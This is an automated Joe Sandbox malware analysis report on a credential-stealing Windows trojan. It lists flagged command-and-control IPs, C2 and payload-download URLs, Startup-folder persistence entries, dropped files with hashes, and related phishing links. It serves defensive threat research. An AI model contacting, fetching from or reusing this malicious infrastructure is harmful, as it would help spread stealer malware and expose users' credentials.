https://sectigo.com/CPS0D	QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://www.sqlite.org/copyright.html.	u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2187629320.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/JamesNK/Newtonsoft.Json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://91.215.85.66:9000	MSBuild.exe, 0000000D.00000002.2895391729.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432036
Start date and time:	2024-04-26 10:26:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QPoX60yhZt.exe renamed because original name is a hash value
Original Sample Name:	96b085b3f6ee7441236cee54161309d0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@27/71@6/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 113 Number of non-executed functions: 236
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.68.123.157, 40.126.7.35, 40.126.28.23, 40.126.28.19, 40.126.28.20, 40.126.28.13, 40.126.28.21, 40.126.28.22, 40.126.28.14, 23.45.182.85, 23.45.182.93, 20.3.187.198, 192.229.211.108, 20.189.173.22, 52.165.164.15, 20.189.173.21, 23.193.120.112, 20.9.155.148
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:27:22	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA915.tmp
09:27:35	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
10:27:26	API Interceptor	1x Sleep call for process: cmd.exe modified
10:27:29	API Interceptor	2x Sleep call for process: WerFault.exe modified
10:27:39	API Interceptor	273600x Sleep call for process: MSBuild.exe modified
10:27:49	API Interceptor	96644x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
10:28:14	API Interceptor	221373x Sleep call for process: BAEBFIIECB.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
185.172.128.228	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=two
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://ww1.lourdoueisienne.website/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://powerpointmicrosoftoffice.top/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:d35aec95-f365-414c-8371-68e6d7d2ec41	Get hash	malicious	Unknown	Browse	192.229.211.108
	Payment.exe	Get hash	malicious	AgentTesla	Browse	192.229.211.108
	https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQm	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://colmec.it/category/news	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://farolcontabilidade.com/secure/securehtm/securehtm/?uid=vxyz@conde.jp.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://householdshop.club/	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://gmial.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://cleverchoice.com.au	Get hash	malicious	Unknown	Browse	192.229.211.108
svc.iolo.com	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
note.padd.cn.com	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
iolo0.b-cdn.net	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	169.150.236.98
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.251
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.99
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.244
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
NADYMSS-ASRU	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQm	Get hash	malicious	HTMLPhisher	Browse	52.108.8.12
	INQ No. HDPE-16-GM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	52.175.38.24
	https://4yu76uyd4.best/ccon/	Get hash	malicious	Unknown	Browse	13.107.246.41
	DOC-Zcns1G_.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	DOC-Zcns1G_.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	DOC-Zcns1G_.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://shorturl.at/lMOT7	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	52.230.18.38
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	52.230.18.38
NADYMSS-ASRU	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://ww1.lourdoueisienne.website/	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	https://powerpointmicrosoftoffice.top/	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:d35aec95-f365-414c-8371-68e6d7d2ec41	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQm	Get hash	malicious	HTMLPhisher	Browse	195.181.163.195 173.222.162.32
	https://colmec.it/category/news	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	https://farolcontabilidade.com/secure/securehtm/securehtm/?uid=vxyz@conde.jp.com	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	http://householdshop.club/	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	http://cleverchoice.com.au	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	BundleSweetIMSetup.exe	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32
	https://4yu76uyd4.best/ccon/	Get hash	malicious	Unknown	Browse	195.181.163.195 173.222.162.32

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAEBFIIECBGCBGDHCAFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFCFHDHIIIECBGCAKFIJDHJEG

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
